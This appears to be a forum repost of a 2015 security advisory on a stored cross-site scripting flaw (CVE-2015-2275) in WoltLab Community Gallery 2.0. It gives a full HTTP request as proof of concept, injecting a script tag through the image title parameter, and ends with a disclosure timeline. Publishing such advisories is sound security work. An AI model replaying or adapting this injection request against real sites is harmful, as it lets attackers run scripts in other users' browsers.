Aerosol Posted March 12, 2015 Report Share Posted March 12, 2015 #Vulnerability title: Community Gallery - Srored Corss-Site Scriptingvulnerability#Product: Community Gallery#Vendor: https://www.woltlab.com#Affected version: Community Gallery 2.0 before 12/10/2014#Download link:https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery#Fixed version: Community Gallery 2.0 after 12/26/2014#CVE ID: CVE-2015-2275#Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn)::PROOF OF CONCEPT::+ REQUEST:POST/7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1Host: targetUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101Firefox/36.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/Content-Length: 1300Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3;__cfduid=dceb0da13e569549c9531d07b3d287acb1420598620Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=Connection: keep-alivePragma: no-cacheCache-Control: no-cacheactionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7¶meters%5Bdata%5D%5B7%5D%5BalbumID%5D=1¶meters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3¶meters%5Bdata%5D%5B7%5D%5Bdescription%5D=test¶meters%5Bdata%5D%5B7%5D%5BenableComments%5D=1¶meters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg¶meters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948¶meters%5Bdata%5D%5B7%5D%5Bheight%5D=480¶meters%5Bdata%5D%5B7%5D%5BimageID%5D=7¶meters%5Bdata%5D%5B7%5D%5Blatitude%5D=0¶meters%5Bdata%5D%5B7%5D%5Blongitude%5D=0¶meters%5Bdata%5D%5B7%5D%5Borientation%5D=1¶meters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing¶meters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0¶meters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg¶meters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E¶meters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg¶meters%5Bdata%5D%5B7%5D%5Bwidth%5D=640¶meters%5Bdata%5D%5B7%5D%5Blocation%5D=¶meters%5BisEdit%5D=1- Vulnerable parameter: parameters[data][7][title]::DISCLOSURE::+ 12/10/2014: Detect vulnerability+ 12/10/2014: Send the detail vulnerability to vendor+ 03/11/2015: Public information::REFERENCE::-http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html::DISCLAIMER::THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OFANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANYIMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSEOR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE ISA SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATIONOR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,AND AT THE USER'S OWN RISK.--------------------------------------------ITAS Team (www.itas.vn)Source Quote Link to comment Share on other sites More sharing options...